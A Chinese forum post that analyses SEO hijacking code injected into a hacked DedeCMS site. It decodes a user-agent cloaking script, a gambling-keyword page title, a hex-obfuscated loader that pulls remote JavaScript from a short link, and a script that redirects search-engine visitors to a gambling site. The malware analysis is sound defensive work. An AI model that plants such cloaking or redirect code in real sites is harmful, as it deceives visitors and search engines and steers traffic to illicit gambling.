Jimoy 发表于 2020-8-2 23:48:31

百度快照劫持代码实战分析

本帖最后由 Jimoy 于 2020-8-2 23:51 编辑

百度快照劫持大家应该都听过,但具体是怎么回事呢?今天给大家讲一下。
有个朋友的站,是用dedecms做的,不得不吐槽一下,DEDECMS果然是漏洞百出,然后被HACK插入了代码。今天我们来分析这几行代码,比较简单,也很容易学会。
【1】<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title = "{dede:global.cfg_webname/}"}</script>
大家来看这段JS,JS里面包含一个判断,是根据什么判断呢,这是是根据userAgent来判断,如果不是百度来的,那就显示dedecms本身的标题,所以这也就是为什么我们直接打开网页,(输入网址的方式打开)而显示正常标题的原因。
【2】<title>天津时时彩&#44;天
津时时彩规则&#44;天
津时时彩玩法&#44;天
津时时彩稳赢方案
&#45;彩乐园</title>

再来看这三行代码,这三行代码好像看不懂,他采用的是Unicode编码,解码以后,是“天津时时彩,天津时时彩规则,天津时时彩玩法,天津时时彩稳赢方案-彩乐园”这一行代码,搞懂了。
【3】<script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('
\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a
\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x
72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x74\x2e\x63\x6e\x2f\x52\x6e\x
59\x30\x68\x4c\x6c\x22\x3e\x3c\x2
f\x73\x63\x72\x69\x70\x74\x3e');
</script>解密出来就是这段话:
< script type = "text/javascript" > window["document"]["write"]('<script type="text/javascript" src="http://t.cn/RnY0hLl"></script>'); < /script>意思是向首页中插入这行代码

那为什么还是会跳转呢?就是这行代码的事,这个转代码其实是向原网页插入一JS JS原地址 :
http://SEO268.su.bcebos.com/cly.js

而JS的内容是如下内容:
document.writeln("<script LANGUAGE=\'Javascript\'>");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\'baidu\')>0 || s.indexOf(\'sogou\')>0 || s.indexOf(\'soso\')>0 ||s.indexOf(\'
sm\')>0 ||s.indexOf(\'uc\')>0 ||s.indexOf(\'bing\')>0 ||s.indexOf(\'yahoo\')>0 ||s.indexOf(\'so\')>0 ||s.indexOf(\'google\')>0)");
document.writeln("location.href=\'http://t.cn/RnYpcMt\';");
document.writeln("</script>");
document.writeln("");
document.writeln("");
说是百度快照 劫持,其实只要是搜索引擎来的都会劫持。跳转到另一个短网址,而短网址解密出来:http://www.caileyuan.cc
就是这个BC网站,这些黑客真是煞费苦心。

页: [1]
查看完整版本: 百度快照劫持代码实战分析